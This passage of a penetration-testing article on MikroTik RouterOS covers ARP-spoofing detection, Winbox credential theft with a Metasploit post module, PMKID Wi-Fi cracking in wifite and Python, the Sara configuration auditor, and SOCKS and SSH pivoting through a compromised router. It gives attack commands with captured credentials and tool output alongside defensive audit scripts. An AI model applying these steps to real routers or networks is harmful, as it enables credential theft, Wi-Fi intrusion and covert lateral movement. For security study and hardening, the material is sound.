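GATEWAY_IP, GATEWAY_MAC = "192.168.0.254", "48:a9:8a:01:02:03"   # assumed
ATTACKER_MAC, VICTIM_MAC = "00:0c:29:aa:bb:cc", "08:00:27:11:22:33"  # assumed

def arp_reply(ts, ip, mac, target_mac):
    return {"ts": ts, "src": mac, "dst": target_mac,
            "arp": {"op": "reply", "sender_ip": ip, "sender_mac": mac}}

def sample_frames():
    """Constructed traffic: legitimate gateway reply, spoofed reply for the same IP,
    then 254 ARP-request broadcasts from the attacker in about half a second, and a few
    ordinary broadcasts from the victim that must not trigger anything."""
    frames = [arp_reply(0.0, GATEWAY_IP, GATEWAY_MAC, VICTIM_MAC),
              arp_reply(0.5, GATEWAY_IP, ATTACKER_MAC, VICTIM_MAC)]
    frames += [{"ts": 1.0 + i * 0.002, "src": ATTACKER_MAC, "dst": BROADCAST,
                "arp": {"op": "request", "sender_ip": "192.168.0.10", "sender_mac": ATTACKER_MAC}}
               for i in range(254)]
    frames += [{"ts": 5.0 + i * 0.5, "src": VICTIM_MAC, "dst": BROADCAST} for i in range(4)]
    return frames

def run(frames, **kwargs):
    mon = L2Monitor(static_bindings={GATEWAY_IP: GATEWAY_MAC}, **kwargs)
    for frame in sorted(frames, key=lambda f: f["ts"]):
        mon.observe(frame)
    return mon.alerts

if __name__ == "__main__":
    for alert in run(sample_frames()):
        print(alert)
```

On a real sensor the frames would come from a pcap or a raw socket on the mirror port; the logic is the same. The trusted static entry is what makes the conflict check reliable: without it, whichever host answers first for an IP is believed, which is exactly the weakness DAI's DHCP-snooping binding table is meant to close.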

Metasploit: Winbox Credentials Extractor

This Metasploit module is designed to extract stored passwords from Winbox settings on MikroTik devices when the “Keep Password” option is enabled. It works on compromised Windows hosts where Winbox is installed and extracts account data that can be used for further access to devices.

This post-exploitation vector rests entirely on human error. The attack succeeds only if the MikroTik administrator left the "Keep Password" option enabled in Winbox: that option stores the password in Winbox's settings file, where it becomes available to anyone who compromises the workstation. The administrator trades security for the convenience of a saved password and risks leaking a credential that compromises the device.

Before running the module, identify the Meterpreter session of the compromised machine:

  • List the active sessions:
    sessions
  • To drop out of the Meterpreter shell while leaving the session alive, use:
    background

Then, with the session backgrounded, load the post/windows/gather/credentials/winbox_settings post-exploitation module:

msf6 exploit(multi/handler) > use post/windows/gather/credentials/winbox_settings

Specify the session number. When you have active shells in Metasploit, each of them has a unique numeric identifier, use it:

msf6 post(windows/gather/credentials/winbox_settings) > set SESSION 2
In my case the session had the ID 2.

And then running the module:

msf6 post(windows/gather/credentials/winbox_settings) > show options

Module options (post/windows/gather/credentials/winbox_settings):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on


View the full module info with the info, or info -d command.
msf6 post(windows/gather/credentials/winbox_settings) > run

Result:

msf6 post(windows/gather/credentials/winbox_settings) > run

[*] Checking Default Locations...
[+] Found File at C:\Users\caster\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
[+] Login: engineer
[+] Password: clonazepam1337
[*] Post module execution completed
msf6 post(windows/gather/credentials/winbox_settings) > 
Module operation

How this post-exploitation module works

The module checks the default location of the Winbox settings file in the user profile, which in my case was:

C:\Users\caster\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw

It extracts credentials, such as login and password, from the settings.cfg.viw file. Example of extracted data:

  • Login: engineer
  • Password: clonazepam1337

This account can be used to access MikroTik devices via Winbox or other administrative interfaces. Check the validity of the received account:

Successful connection to the router using SSH, engineer:clonazepam1337

In this way an account for the equipment can be obtained from a workstation. The module is especially useful when the compromised computers belong to the IT department or to system administrators.

PMKID Attack on MikroTik Routers

PMKID (Pairwise Master Key Identifier) is a 16-byte value derived from the PMK, which in WPA/WPA2-PSK is itself derived from the passphrase and the SSID, together with the MAC addresses of the AP and the client. The AP includes it in the first message of the 4-way handshake, so an attacker who captures it can test candidate passphrases offline in a dictionary or brute-force attack.

By default, RouterOS access points include the PMKID in the handshake (the disable-pmkid setting is off). This is meant to speed up client reconnection, but it creates a weakness that can be exploited: the attacker only has to send an association request to the AP to receive the first handshake message with the PMKID, so no legitimate client needs to be connected, which makes the attack more stealthy.

Attack Equipment

I used the Alfa AWUS036AC adapter with Alfa ARS-N19 antennas to perform the attack. This adapter uses the RTL8812AU chip, which makes it a great tool for wardriving

AWUS036AC & ARS-N19

PMKID Attack Example

A tool wifite, which automates attacks on Wi-Fi networks, including PMKID capture and cracking, was used to perform the PMKID attack. Wifite is a popular wireless network testing tool that simplifies the process of attacking various authentication protocols, including WPA/WPA2 using PMKID. It allows you to automate all steps from packet capture to password cracking attempts via dictionaries.

Stage 1

The attacker selects a target AP that includes a PMKID in its handshake. To do this, wifite scans nearby Wi-Fi networks and identifies those using WPA/WPA2 from which a PMKID can be obtained.

caster@kali:~$ sudo wifite -i wlan1 --pmkid

The tool will scan the available Wi-Fi networks and displays a list of them to select a target.

The --pmkid option in wifite activates the PMKID capture mode, which allows the tool to search and extract PMKIDs from available networks using WPA/WPA2

Stage 2

Unlike a classic WPA attack, where you have to deauthenticate a client so that it reconnects to the AP and you can capture the 4-way handshake, a PMKID attack does not need any connected client: the attacker's own association request is enough. This makes the attack more stealthy, since no user session is disrupted.

PMKID Capture Example:

[+] (1/1) Starting attacks against 44:A4:84:XX:XX:XX (MSC)
[+] MSC (79db) PMKID CAPTURE: Loaded existing PMKID hash: hs/pmkid_MSC_44-A4-84-XX-XX-XX_2024-09-25T16-30-09.22000

In this example, wifite found the MSC access point with BSSID 44:A4:84:XX:XX:XX, obtained its PMKID and saved the hash in hashcat's 22000 format.

Stage 3

After capturing the PMKID, wifite moves on to the next step, which is to attempt to crack the password using a dictionary. To do this, it uses dictionary files such as wordlist-probable.txt and tries to match the password based on the captured PMKID.

[+] MSC (79db) PMKID CRACK: Cracking PMKID using /usr/share/dict/wordlist-probable.txt ...

The tool searches passwords from the dictionary until the correct password is found.

It is important to note that the success of the attack depends directly on the quality of the dictionary: if the passphrase is not in it, the attack fails.

After a successful bruteforce, wifite displays the result, including the access point name (SSID), BSSID, network key (password) and the file where the PMKID is saved for further analysis.

An example of a successful attack:

[+] MSC (79db) PMKID CRACKED: Key: 44a484xxxxxx:dc701486178f:MSC:benzodiazepines
[+]   Access Point Name: MSC
[+]  Access Point BSSID: 44:A4:84:XX:XX:XX
[+]          Encryption: PMKID
[+]          PMKID File: hs/pmkid_MSC_44-A4-84-XX-XX-XX_2024-09-25T16-30-09.22000
[+]      PSK (password): 44a484xxxxxx:dc701486178f:MSC:benzodiazepines
[+] saved crack result to cracked.json (1 total)

In this example the attacker cracked the passphrase benzodiazepines of the MSC network; the PMKID file was kept for later use.

PMKID Outro

The PMKID attack does not require active clients, which makes it more convenient and less noticeable than classic WPA/WPA2 methods such as capturing the 4-way handshake. With a large dictionary and an adapter that supports monitor mode, the attack can be carried out in a short time. Administrators can disable PMKID on their interfaces (disable-pmkid=yes), which defeats the clientless variant, but the real fix is a passphrase that resists dictionary attacks: the same PMK can still be attacked offline from a captured 4-way handshake.
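The arithmetic that wifite hands to hashcat is short enough to show in full. The following added example (my own code, not the article's, wifite's or hashcat's) derives the PMK from a candidate passphrase with PBKDF2-HMAC-SHA1, computes the PMKID as HMAC-SHA1-128 over "PMK Name" || MAC_AP || MAC_STA, parses a hashcat 22000 PMKID record and runs a dictionary attack against it. The real MSC hash is not on the page, so the record is constructed from the article's cracked passphrase (the BSSID is a placeholder, since the article masks it); a PBKDF2 test vector from IEEE 802.11 ("password"/"IEEE") is included so the derivation itself is checked against a known value.

```python
# Added example: PMKID derivation and offline dictionary attack on a hashcat 22000 record.
# Not from the article, wifite or hashcat. The record below is constructed, not the real MSC hash.
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk, mac_ap, mac_sta):
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]

def parse_22000(line):
    """hashcat 22000 line: WPA*01*<pmkid>*<mac_ap>*<mac_sta>*<essid hex>*... (type 01 = PMKID)."""
    parts = line.strip().split("*")
    if len(parts) < 6 or parts[0] != "WPA" or parts[1] != "01":
        raise ValueError("not a WPA*01 (PMKID) record")
    return {"pmkid": bytes.fromhex(parts[2]), "mac_ap": bytes.fromhex(parts[3]),
            "mac_sta": bytes.fromhex(parts[4]), "essid": bytes.fromhex(parts[5]).decode()}

def build_22000(passphrase, essid, mac_ap, mac_sta):
    """Construct a record from a known passphrase; only used to make the demo self-contained."""
    value = pmkid(pmk_from_passphrase(passphrase, essid), mac_ap, mac_sta)
    return f"WPA*01*{value.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid.encode().hex()}***"

def crack(record, wordlist):
    """Offline dictionary attack: one PBKDF2 (4096 rounds) per candidate, nothing sent."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # WPA passphrase bounds: skip impossible words
            continue
        guess = pmkid(pmk_from_passphrase(candidate, record["essid"]),
                      record["mac_ap"], record["mac_sta"])
        if hmac.compare_digest(guess, record["pmkid"]):
            return candidate
    return None

MAC_AP = bytes.fromhex("44a484000000")   # placeholder: the article masks the real BSSID
MAC_STA = bytes.fromhex("dc701486178f")  # attacker adapter MAC as printed in the article
SAMPLE_LINE = build_22000("benzodiazepines", "MSC", MAC_AP, MAC_STA)
WORDLIST = ["password", "12345678", "short", "clonazepam1337", "benzodiazepines"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(parse_22000(SAMPLE_LINE), WORDLIST))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is the whole reason dictionary quality decides the outcome: hashcat mode 22000 does nothing smarter than this loop, only faster on a GPU.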

Sara

Sara is a tool I developed to analyze configurations of MikroTik RouterOS devices. The main goal of Sara is to automate the process of analyzing configuration files, identifying vulnerabilities, configuration weaknesses and exploitation opportunities. The tool was created to quickly and accurately analyze configurations that may contain potential security issues such as invalid firewall rules, open ports, weak passwords, and invalid routes.

Why is configuration analysis important?

Network device configurations are often the cause of vulnerabilities. Incorrect firewall settings, default passwords, uncovered ports, or outdated security policies can open the door to attacks. Sara analyzes these configuration files, identifying potential threats and providing recommendations for security improvements.
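To show what such an analysis looks like at the level of individual checks, here is an added example (my own code, not Sara's): a small analyser for a RouterOS export that flags plaintext and brute-forceable management services, services reachable from any address, default SNMP communities, UPnP, remote DNS requests and a missing password policy. It is run over two constructed export fragments, one with the weak settings and one with the hardened versions, so the corrected configuration is visible beside the weak one. The exports are not the article's routeros-config.rsc, and the addresses, community name and certificate name in the hardened version are assumptions.

```python
# Added example: minimal RouterOS export analyser. Not Sara's code. WEAK and HARDENED are
# constructed exports; subnets, community and certificate names in HARDENED are assumptions.
import re
import shlex

PLAINTEXT = {"telnet", "ftp", "www"}
BRUTEFORCE_PRONE = {"api", "api-ssl"}
DEFAULT_COMMUNITIES = {"public", "private"}
ANYWHERE = {"", "::/0", "0.0.0.0/0"}

def parse_export(text):
    """Yield (section, command, positional args, key=value args) for each export line.
    Backslash continuation lines are joined; [ find ... ] selectors are dropped."""
    section = None
    for raw in text.replace("\\\n", " ").splitlines():
        line = re.sub(r"\[.*?\]", "", raw).strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        tokens = shlex.split(line)
        positional, kv = [], {}
        for tok in tokens[1:]:
            key, eq, value = tok.partition("=")
            if eq:
                kv[key] = value
            else:
                positional.append(tok)
        yield section, tokens[0], positional, kv

def analyze(text):
    """Return (severity, message) findings for the checks listed in the lead-in."""
    findings = []
    for section, cmd, pos, kv in parse_export(text):
        if section == "/ip service" and cmd == "set" and pos and kv.get("disabled", "no") == "no":
            name = pos[0]
            if name in PLAINTEXT:
                findings.append(("warning", f"{name} enabled: plaintext management protocol"))
            if name in BRUTEFORCE_PRONE:
                findings.append(("note", f"{name} enabled: RouterOS API is a brute-force target"))
            if kv.get("address", "") in ANYWHERE:
                findings.append(("note", f"{name} reachable from any address; set address= to trusted subnets"))
        elif section == "/snmp community" and cmd in ("set", "add"):
            name = kv.get("name", "")
            if name in DEFAULT_COMMUNITIES:
                findings.append(("warning", f"SNMP community '{name}' is a default string"))
            if kv.get("addresses", "") in ANYWHERE:
                findings.append(("note", f"SNMP community '{name}' accepted from any address"))
        elif section == "/ip upnp" and kv.get("enabled") == "yes":
            findings.append(("warning", "UPnP enabled: any LAN host can open port forwards"))
        elif section == "/ip dns" and kv.get("allow-remote-requests") == "yes":
            findings.append(("warning", "allow-remote-requests=yes: open resolver unless the firewall drops UDP/53 from WAN"))
        elif section == "/user settings" and "0" in (kv.get("minimum-password-length", "0"),
                                                      kv.get("minimum-categories", "0")):
            findings.append(("warning", "no password policy: minimum-password-length or minimum-categories is 0"))
    return findings

WEAK = """# constructed export fragment (weak settings)
/ip service
set telnet address="" disabled=no port=23
set ftp address="" disabled=no port=21
set www address="" disabled=no port=80
set ssh address="" disabled=no port=22
set www-ssl address="" certificate=none disabled=yes port=443
set api address="" disabled=no port=8728
set winbox address="" disabled=no port=8291
set api-ssl address="" certificate=none disabled=no port=8729
/snmp community
set [ find default=yes ] addresses=::/0 name=public read-access=yes
add addresses=::/0 name=private write-access=yes
/ip upnp
set enabled=yes
/ip dns
set allow-remote-requests=yes servers=1.1.1.1
/user settings
set minimum-categories=0 minimum-password-length=0
"""

HARDENED = """# constructed export fragment (hardened settings; subnets and names assumed)
/ip service
set telnet disabled=yes port=23
set ftp disabled=yes port=21
set www disabled=yes port=80
set ssh address=192.168.0.0/24 disabled=no port=22
set www-ssl address=192.168.0.0/24 certificate=router-cert disabled=no port=443
set api disabled=yes port=8728
set winbox address=192.168.0.0/24 disabled=no port=8291
set api-ssl disabled=yes port=8729
/snmp community
set [ find default=yes ] addresses=192.168.0.10/32 name=nms-ro-7x2q read-access=yes
/ip upnp
set enabled=no
/ip dns
set allow-remote-requests=no
/user settings
set minimum-categories=3 minimum-password-length=12
"""

if __name__ == "__main__":
    for severity, message in analyze(WEAK):
        print(f"[{severity}] {message}")
    print("hardened findings:", analyze(HARDENED))
```

The analyser only sees the export it is given, which is why the DNS finding is phrased conditionally: whether allow-remote-requests=yes is a problem depends on the input-chain firewall rules, and a checker that does not parse /ip firewall filter must say so rather than guess.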

Tool Installation

Sara was added to the Kali Linux repository on September 19, 2024, making it easy to install and use. Use the following command to install the tool:

caster@kali:~$ sudo apt update && sudo apt install sara

After installation, you can invoke the tool's help with the command:

caster@kali:~$ sara -h                                              

    _____                 
   / ____|                
  | (___   __ _ _ __ __ _ 
   \___ \ / _` | '__/ _` |
   ____) | (_| | | | (_| |
  |_____/ \__,_|_|  \__,_|  v1.0

    RouterOS Security Inspector. Designed for security professionals

    Author: Magama Bazarov, <[email protected]>

    It's recommended to provide a configuration file exported using the 'export verbose' command

usage: sara [-h] --config-file CONFIG_FILE

options:
  -h, --help            show this help message and exit
  --config-file CONFIG_FILE
                        Path to the RouterOS configuration file (or .rsc)

Config Analyzing

To analyze the configuration of a MikroTik router, pass it the .rsc file exported from the device (preferably with /export verbose, so that default values are included). This is done as follows:

caster@kali:~$ sara --config routeros-config.rsc  

The tool will perform a detailed configuration analysis, providing a report on potential vulnerabilities and recommendations for remediation:

caster@kali:~$ sara --config routeros-config.rsc                    

    _____                 
   / ____|                
  | (___   __ _ _ __ __ _ 
   \___ \ / _` | '__/ _` |
   ____) | (_| | | | (_| |
  |_____/ \__,_|_|  \__,_|  v1.0

    RouterOS Security Inspector. Designed for security professionals

    Author: Magama Bazarov, <[email protected]>

    It's recommended to provide a configuration file exported using the 'export verbose' command

[*] Analyzing the configuration file: routeros-config.rsc (34.69 KB)

[+] Device Information
    [*] RouterOS Version: 7.15.3
    [*] Model: C52iG-5HaxD2HaxD
    [*] Serial Number: XXXXXXXXXXX

[+] Checking RMI Services
    [!] Warning: The following RMI services are enabled and may be unsafe: telnet, ftp, www.
    [!] Caution: The following RMI services are enabled: ssh, www-ssl, winbox.
    [!] Note: The following RMI services are enabled and might be susceptible to brute force attacks: api, api-ssl.
    [*] Solution: Disable the above RMI services if they are not required for security.
    [*] Tip: Restrict access to enabled services to trusted subnets only.

[+] Checking UPnP
    [!] Warning: UPnP is enabled. This can expose your network to various security risks, including unauthorized access.
    [*] Solution: Disable UPnP unless absolutely necessary, and ensure your firewall is properly configured.

[+] Checking WiFi Settings
    [!] Warning: WPS is enabled on interface wifi1. WPS Pin code can be cracked, brute-forced.
    [!] Warning: PMKID is enabled on interface wifi1. PMKID is easy to bruteforce.

[+] Checking DNS Settings
    [!] Warning: Router is configured to allow remote DNS requests. Close the DNS UDP/53 port from the Internet.
    [!] Note: DNS over HTTPS (DoH) is not configured. Consider configuring a DoH server for improved privacy.

[+] Checking PoE Settings
    [!] Warning: PoE is enabled on interface ether1 with setting 'auto-on'. This could supply power to connected devices and potentially damage them if not properly managed.

[+] Checking Protected RouterBOOT
    [!] Warning: Protected RouterBOOT is disabled. This may allow unauthorized changes to the bootloader settings.
    [*] Solution: Enable Protected RouterBOOT to prevent unauthorized access to the bootloader.

[+] Checking SOCKS Proxy
    [!] Warning: SOCKS Proxy is enabled. The presence of SOCKS may indicate that the device has been compromised.
    [*] Solution: Disable SOCKS Proxy if it is not required.

[+] Checking User Password Policies
    [!] Warning: Password policies are not properly configured. Both minimum password categories and minimum password length are set to 0.
    [*] Solution: Set a higher minimum password length and require at least one or more character categories (e.g., uppercase, lowercase, numbers, special characters) for better security.

[+] Checking Connection Tracking
    [!] Connection Tracking is currently set to 'auto'.
    [*] Advice: If this device is being used as a transit router, you might consider disabling Connection Tracking to improve performance. However, proceed with caution as it can affect certain network features.

[+] Checking RoMON Settings
    [!] Warning: RoMON is enabled. If you are using RoMON, you should carefully manage its settings, as an attacker might use it to gain access to other RouterOS devices.
    [*] Advice: Regularly review RoMON configurations and ensure that only authorized devices can use RoMON.

[+] Checking SNMP Communities
    [!] Warning: SNMP community 'public' is in use. Possible Information Gathering attack vector by bruteforcing community string.
    [!] Warning: SNMP community 'private' is in use. Possible Information Gathering attack vector by bruteforcing community string.
    [*] Solution: Change the SNMP community names to something more secure, and restrict SNMP access to trusted IP addresses only.
Sara is doing a configuration analysis

Analysis of the output

From the presented output of Sara, we can notice several vulnerabilities that can pose a threat to the network:

  1. Open RMI services (telnet, ftp, www): These services may not be secure unless encryption is used. Recommendation is to disable them if they are not needed and restrict access to trusted networks only;
  2. Active UPnP: This is a known attack vector because it allows automatic port forwarding, creating an opportunity for unauthorized access. It is recommended to disable UPnP if it is not needed;
  3. Wi-Fi settings (WPS and PMKID): Enabled WPS and PMKID are vulnerable to brute-force and hacking attacks. Disabling these features will improve wireless security;
  4. Remote DNS queries: Opening a DNS port for queries from the Internet can lead to attacks such as DNS amplification. Closing this port and using DoH will improve security and privacy;
  5. PoE settings: Enabled PoE can cause damage to connected devices if not properly configured. This requires monitoring or disabling PoE when not in use;
  6. RouterBOOT protection disabled: This may allow an attacker to change the bootloader settings, which could result in unauthorized configuration changes. RouterBOOT protection must be enabled;
  7. Insecure SNMP Communities: Using default values such as public and private allows attackers to easily access information via SNMP. It is necessary to change these values to more secure values and restrict access by IP.

Sara Outro

Network device configurations play a key role in infrastructure security. Even if a device contains no known vulnerabilities or exploits, misconfigurations can be a serious threat. Misconfigurations such as open ports, activated legacy services, or weak passwords create potential entry points for attackers. These vulnerabilities are often ignored by administrators, but they can be used to escalate privileges, bypass security measures, and execute attacks such as password brute force, firewall attacks, or stealth attacks via insecure services.

Therefore, regular analysis of network device configurations is an important part of the overall network defense process. Even if there are no critical vulnerabilities, the configuration should be reviewed to ensure that secure passwords are used, traffic is filtered correctly, and unnecessary services are disabled.

Pivoting

Pivoting (from the word pivot) is a technique used by attackers or security professionals to extend access within a compromised network. Once one device on a network is successfully compromised, an attacker can use it as a pivot point to move to other segments or devices on that network. The primary goal of pivoting is to bypass network restrictions, such as firewalls, and gain access to isolated systems or resources that are not directly accessible from the outside.

CAUTION: These pivoting techniques work both from the Internet and from within the infrastructure.

SOCKS

A method by which an attacker can redirect traffic through a compromised device by creating a proxy server. MikroTik RouterOS allows you to configure a built-in SOCKS server that can be used for pivoting. Once the SOCKS server is configured, an attacker can break into the internal infrastructure through RouterOS using it as an entry point.

How it's gonna work

  1. Configuring a SOCKS server on RouterOS: After compromising a MikroTik device, an attacker configures a SOCKS proxy to redirect traffic. This involves selecting the SOCKS version (4 or 5), specifying the port, and adding the IP addresses that are allowed access.

Example of setting up a SOCKS server on MikroTik:

/ip/socks/access/add src-address=89.169.135.43 action=allow
/ip/socks/set enabled=yes version=5 port=7777

RouterOS commands (SOCKS)

In this example, a SOCKS server version 5 is configured on RouterOS on port 7777 and access is granted to the attacker's IP address 89.169.135.43.
  2. Port Availability Check: For a successful connection, it is important to make sure that port 7777 is reachable from the Internet. If the firewall is blocking this port, a rule must be added to open it:
/ip/firewall/filter/add chain=input port=7777 protocol=tcp in-interface=ether1 action=accept

RouterOS firewall rule for TCP/7777

  3. Attacker Connection via SOCKS: An attacker connects to the RouterOS SOCKS server over the Internet using their device's proxy settings. In this case, the attacker edits the proxychains configuration file to route traffic through the SOCKS proxy.

In the /etc/proxychains.conf file, you must specify the IP address of the compromised device and the port on which the SOCKS server is running:

socks5 <victim_public_ip> 7777

SOCKS Pivoting Map

I drew a little net drawing of what it would look like

SOCKS Pivoting Map

SOCKS Pivoting

Now, using proxychains, an attacker can run commands or applications through a SOCKS proxy. For example, run nmap to scan the internal network through a compromised router:

Example of scanning an SSH port with the -sT flag, towards hosts inside 10.10.100.0/24
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.100
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:40 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.100:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.100:22  ...  OK
Nmap scan report for 10.10.100.100
Host is up (0.095s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.200
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:40 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.200:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.200:22  ...  OK
Nmap scan report for 10.10.100.200
Host is up (0.095s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.7
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:41 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.7:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.7:22  ...  OK
Nmap scan report for 10.10.100.7
Host is up (0.14s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
caster@kali:~$

NOTE: I've used nmap in this article to demonstrate in a clear and easy to understand way that this pivoting method works. It is known that nmap does not work well with proxychains. Running nmap in the pivoting scenarios of this article is just a way to visualize that moving into the infrastructure does happen.

Socks Outro

SOCKS pivoting is a powerful tool to move covertly across the network, giving an attacker access to isolated segments through compromised devices. Configuring a proxy server on RouterOS opens the door to further reconnaissance and attacks in the internal infrastructure, making this pivoting method extremely effective.

SSH Dynamic Port Forwarding

SSH Dynamic Port Forwarding can serve as a pivoting technique that allows an attacker to use a compromised device to tunnel traffic through an SSH connection.

In order to enable the DPF feature on RouterOS, you must enable the corresponding setting for the SSH server:

/ip/ssh/set forwarding-enabled=both

According to the official documentation, the forwarding-enabled=both option allows both local and remote SSH forwarding:

  • no - SSH forwarding is disabled;
  • local - local forwarding is allowed, which also controls dynamic forwarding;
  • remote - remote forwarding is allowed;
  • both - both forwarding methods are allowed (we need both)

Once RouterOS is configured, an attacker can connect to a compromised device using SSH Dynamic Port Forwarding, turning the router into a gateway through which they can get into the infrastructure:

caster@kali:~$ ssh -D 1080 -C -N -f caster@victim
  • -D 1080 - enables dynamic forwarding over port 1080;
  • -C - enables data compression;
  • -N - disables command execution on the remote device, limiting the session to tunneling only;
  • -f - starts the session in the background.

SSH DPF Pivoting Map

I drew a little net drawing of what it would look like

SSH DPF Pivoting Map

After successful execution of this command, SSH starts listening on port 1080 on the local machine:

LISTEN    0         128              127.0.0.1:1080            0.0.0.0:*        users:(("ssh",pid=389297,fd=5))

Next, the attacker configures proxychains:

socks5 127.0.0.1 1080
This is /etc/proxychains.conf

Once proxychains are configured, an attacker can use tools such as nmap to scan the internal network through the compromised RouterOS:

caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.100
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 10:12 UTC
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:22  ...  OK
Nmap scan report for 10.10.100.100
Host is up (0.033s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

To vary the examples beyond nmap, here is an attempt to connect to a host over SSH through the same tunnel:

caster@caster:~$ proxychains ssh admin@10.10.100.100
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:22  ...  OK
admin@10.10.100.100's password:

  ********************************************
  *        ePMP command line interface       *
  ********************************************

Connected sessions:
User:                         Started [seconds ago]:   Last activity:   IP:
admin (current)               0                        0                10.10.100.254

CambiumBS1>
CambiumBS1>
CambiumBS1>

Outro

SSH Dynamic Port Forwarding provides a convenient way to pivot through compromised devices. Configuring dynamic forwarding on RouterOS allows an attacker to reach isolated resources through an SSH tunnel, using proxychains to redirect traffic. This method remains hidden from most network monitoring systems, making it an effective tool for exploring internal infrastructure.
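As an added, defender-side example that is not part of the article or the Sara tool, here is a small Python audit that reads a RouterOS /export dump and flags the settings the SOCKS and SSH DPF sections above rely on (an enabled SOCKS server and its access list, an input accept rule for the SOCKS port, forwarding-enabled on the SSH server), together with two of Sara's checks (UPnP, default SNMP communities). The export snippet is constructed from the article's own commands, and the export line format (section header, then set/add lines of key=value pairs) is an assumption.

```python
"""Audit a RouterOS '/export' dump for pivoting-friendly settings.
Added example, not Sara's code; parser and sample export are assumptions."""
import re
from collections import defaultdict

# Constructed export snippet mirroring the RouterOS commands in the article.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=7777 version=5
/ip socks access
add action=allow src-address=89.169.135.43
/ip ssh
set forwarding-enabled=both
/ip firewall filter
add action=accept chain=input in-interface=ether1 port=7777 protocol=tcp
/ip upnp
set enabled=yes
/snmp community
set [ find default=yes ] name=public
"""

KV = re.compile(r'(\S+?)=("[^"]*"|\S+)')   # key=value or key="quoted value"


def parse_export(text):
    """Return a list of (section path, verb, {key: value}) tuples."""
    entries, path = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):            # section header, e.g. '/ip socks access'
            path = line
            continue
        verb = line.split(None, 1)[0]       # 'set' or 'add'
        props = {k: v.strip('"') for k, v in KV.findall(line)}
        entries.append((path, verb, props))
    return entries


def audit(text):
    """Return the list of findings (strings) for an export dump."""
    findings, by_path = [], defaultdict(list)
    for path, _verb, props in parse_export(text):
        by_path[path].append(props)
    socks_port = None
    for p in by_path["/ip socks"]:
        if p.get("enabled") == "yes":
            socks_port = p.get("port", "1080")   # RouterOS default SOCKS port
            findings.append(f"SOCKS proxy enabled on TCP/{socks_port}")
    for p in by_path["/ip socks access"]:
        if p.get("action") == "allow":
            findings.append(f"SOCKS access allowed from {p.get('src-address')}")
    for p in by_path["/ip ssh"]:
        # 'local' also permits dynamic (-D) forwarding, per the article.
        if p.get("forwarding-enabled") in ("local", "both"):
            findings.append(f"SSH dynamic forwarding possible (forwarding-enabled={p['forwarding-enabled']})")
    for p in by_path["/ip firewall filter"]:
        if (p.get("chain") == "input" and p.get("action") == "accept"
                and socks_port and p.get("port") == socks_port):
            findings.append(f"Firewall accepts TCP/{socks_port} on {p.get('in-interface')}")
    for p in by_path["/ip upnp"]:
        if p.get("enabled") == "yes":
            findings.append("UPnP enabled")
    for p in by_path["/snmp community"]:
        if p.get("name") in ("public", "private"):
            findings.append(f"Default SNMP community '{p['name']}' in use")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print("[!]", finding)
```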

